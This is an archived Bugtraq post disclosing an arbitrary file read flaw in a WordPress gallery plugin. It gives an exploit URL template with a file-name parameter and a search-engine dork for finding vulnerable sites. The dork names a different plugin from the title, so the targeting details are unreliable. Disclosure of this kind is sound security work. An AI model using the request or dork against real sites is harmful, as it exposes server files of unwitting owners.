lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Message-Id: <201301101301.r0AD1IV3013415@sf01web2.securityfocus.com>
Date: Thu, 10 Jan 2013 13:01:18 GMT
From: Beni_vanda@...oo.com
To: bugtraq@...urityfocus.com
Subject: Wordpress gallery-3.8.3 plugin Arbitrary File Read Vulnerability

a bug in Wordpress gallery-3.8.3 plugin  that allows to us to occur a
Arbitrary File Read on a Local machin



################################################################################&#8203;##############
#
# Exploit Title : Wordpress gallery-3.8.3 plugin Arbitrary File Read Vulnerability
#
# Author        : IrIsT.Ir
#
# Discovered By : Beni_Vanda    
#
# Home          : http://IrIsT.Ir/forum/
#
# Software Link : http://wordpress.org/extend/plugins/gallery-plugin/
#
# Security Risk : High
#
# Version       : All Version
#
# Tested on     : GNU/Linux Ubuntu - Windows Server - win7
#
# Dork          : inurl:plugins/nextgen-gallery
#
################################################################################&#8203;##############
#
#  Expl0iTs :
#
#  [Target]/wp-content/plugins/gallery-plugin/gallery-plugin.php?filename_1=[AFR]
#
#
################################################################################&#8203;##############
#
# Greats : Amir - B3HZ4D - C0dex - TaK.FaNaR - Dead.Zone - nimaarek - m3hdi - F@rid - dr.tofan
#
# and All Members In Www.IrIsT.Ir/forum
#
################################################################################&#8203;##############

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ